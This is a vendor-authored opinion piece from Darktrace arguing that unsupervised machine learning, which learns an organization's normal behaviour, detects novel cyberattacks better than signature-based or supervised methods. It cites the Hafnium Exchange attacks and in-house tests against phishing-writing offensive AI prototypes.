Ten years ago, cybersecurity was a different ball game. Threat detection tools typically relied on "fingerprinting" and looking for exact matches with previously encountered attacks. This "rearview mirror" approach worked for a long time, when attacks were lower in volume and generally more predictable.

Over the last decade, attacks have become more sophisticated and ever-changing on the offensive side. On the defensive side, this challenge is coupled with complex supply chains, hybrid working patterns, multicloud environments, and IoT proliferation.

The industry recognized that basic fingerprinting could not keep up with the speed of these developments, and the need to be everywhere, at all times, pushed the adoption of AI technology to deal with the scale and complexity of securing the modern business. The AI defense market has since become crowded with vendors promising data analytics, looking for "fuzzy matches": near matches to previously encountered threats, and ultimately, using machine learning to catch similar attacks.

While an improvement to basic signatures, applying AI in this way does not escape the fact that it is still reactive. It may be able to detect attacks that are highly similar to previous incidents, but remains unable to stop new attack infrastructure and techniques that the system has never seen before.

Whatever label you give it, this system is still being fed that same historical attack data. It accepts that there must be a "patient zero" — or first victim — in order to succeed.

The "pretraining" of an AI on observed data is also known as supervised machine learning (ML). And indeed, there are smart applications of this method in cybersecurity. In threat investigation, for example, supervised ML has been used to learn and mimic how a human analyst conducts investigations — asking questions, forming and revising hypotheses, and reaching conclusions — and can now autonomously carry out these investigations at speed and scale.

But what about finding the initial breadcrumbs of an attack? What about finding the first sign that something is off?

The problem with using supervised ML in this area is that it's only as good as its historical training set — but not with things it's never seen before. So it needs to be constantly updated, and that update needs to be pushed to every customer. This approach also requires the customer's data to be sent off to a centralized data lake in the cloud, for it to be processed and analyzed. By the time an organization knows about a threat, often it's too late.

As a result, organizations suffer from a lack of tailored protection, large numbers of false positives, and missed detections because this approach is missing one crucial thing: the context of the unique organization it is tasked with protecting.

But there is hope for defenders in the war of algorithms. Thousands of organizations today use a different application of AI in cyber defense, taking a fundamentally different approach to defend against the entire attack spectrum — including indiscriminate and known attacks but also targeted and unknown attacks.

Rather than training a machine on what an _attack_ looks like, _unsupervised_ machine learning involves the AI learning the _organization_. In this scenario, the AI learns its surroundings, inside and out, down to the smallest digital details, understanding "normal" for the unique digital environment it's deployed in to identify what's _not_ normal.

This is AI that understands "you" in order to know your enemy. Once considered radical, today it defends over 8,000 organizations worldwide by detecting, responding, and even preventing the most sophisticated cyberattacks.

Take the widespread Hafnium attacks exploiting Microsoft Exchange Servers last year. These were a series of new, unattributed campaigns that were identified and disrupted by Darktrace's unsupervised ML in real time across many of its customer environments without any prior threat intelligence associated with these attacks. In contrast, other organizations were left unprepared and vulnerable to the threat until Microsoft disclosed the attacks a few months later.

This is where unsupervised ML works best — autonomously detecting, investigating, and responding to advanced and never-before-seen threats based on a bespoke understanding of the organization being targeted.

At Darktrace, we have tested this AI technology against offensive AI prototypes at our AI research center in Cambridge, UK. Similar to ChatGPT, these prototypes can craft hyperrealistic and contextualized phishing emails and even select a fitting sender to spoof and fire the emails away.

Our conclusions are clear: As we start to see attackers weaponizing AI for nefarious purposes, we can be certain that security teams will need AI to fight AI.

Unsupervised ML will be critical because it learns on the fly, building a complex, evolving understanding of every user and device across the organization. With this bird's-eye view of the digital business, unsupervised AI that understands "you" will spot offensive AI as soon as it starts to manipulate data and will make intelligent microdecisions to block that activity. Offensive AI may well be leveraged for its speed, but this is something that defensive AI will also bring to the arms race.

When it comes to the war of algorithms, taking the right approach to ML could be the difference between a robust security posture and disaster.

**About the Author**

    

Tony Jarvis is Director of Enterprise Security, Asia-Pacific and Japan, at Darktrace. Tony is a seasoned cybersecurity strategist who has advised Fortune 500 companies around the world on best practice for managing cyber-risk. He has counseled governments, major banks, and multinational companies, and his comments on cybersecurity and the rising threat to critical national infrastructure have been reported in local and international media, including CNBC, Channel News Asia, and The Straits Times. Tony holds a BA in Information Systems from the University of Melbourne.

Tag

#intel